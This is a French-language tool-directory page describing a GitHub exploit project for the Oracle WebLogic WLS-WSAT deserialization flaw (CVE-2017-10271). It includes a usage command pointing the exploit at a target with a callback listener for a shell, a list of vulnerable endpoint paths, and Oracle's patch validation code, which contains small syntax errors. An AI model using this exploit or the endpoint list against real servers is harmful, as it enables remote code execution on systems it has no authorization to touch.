Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-10271 — Exploit Python et Metasploit pour la vulnérabilité de désérialisation Oracle WebLogic WLS-WSAT (CVE-2017-10271) avec capacités d'analyse de détection et d'exécution de code à distance. | Kitploit
Outils/GitHubGitHub/kkirsche/cve-2017-10271
Frameworks d'ExploitationGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubkkirsche/cve-2017-10271

CVE-2017-10271

Exploit Python et Metasploit pour la vulnérabilité de désérialisation Oracle WebLogic WLS-WSAT (CVE-2017-10271) avec capacités d'analyse de détection et d'exécution de code à distance.

Voir le dépôt
129422il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-10271

Script de détection et d'exploitation de la vulnérabilité de désérialisation du composant wls-wsat de Weblogic (CVE-2017-10271)

Utilisation

root@kitploit:~
$ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/

Fonctionnalités

  • Script Python autonome
    • Fonction de vérification pour voir si un hôte est vulnérable
    • Fonction d'exploitation pour les cibles Linux
  • Module Metasploit
    • Fonction de vérification pour voir si un hôte est vulnérable
    • Fonction d'exploitation pour toutes les cibles
  • Scanner (./scanners)
    • Vérifie si les hôtes sont vulnérables. Entièrement autonome

Mentions légales

Vous êtes responsable de l'utilisation de ce script. Kevin Kirsche décline toute responsabilité quant aux actions effectuées avec le code présent ici. Ce code a été créé pour les équipes souhaitant valider la sécurité de leurs serveurs, et non pour un usage malveillant.

Remerciements

Un grand merci à Luffin pour avoir créé le POC original sur lequel ce projet se base : https://github.com/Luffin/CVE-2017-10271

URL vulnérables autres que celle affichée :

root@kitploit:~
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

Vulnérabilité associée

CVE 2017-3506

Correctif d'Oracle

Source originale : https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

Source mise à jour : https://nsfocusglobal.com/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

root@kitploit:~
private void validate(InputStream is) {
 WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
 
 try {
  SAXParser parser = factory.newSAXParser();
  
  parser.parse(is, new DefaultHandler()) {
   private int overallarraylength = 0;
   
   public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception {
    if (qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid element qName:object");
    } else if (qName.equalsIgnoreCase("new")) {
     throw new IllegalStateException("Invalid element qName:new");
    } else if (qName.equalsIgnoreCase("method")) {
     throw new IllegalStateException("Invalid element qName:method");
    } else {
     if (qName.equalsIgnoreCase("void")) {
      for(int attClass = 0;attClass < attributes.getLength(); ++attClass) {
       if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
        throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass));
       }
      }
     }
     
     ... more code here ...
    }
   }
  }
 }
}
Télécharger l’outil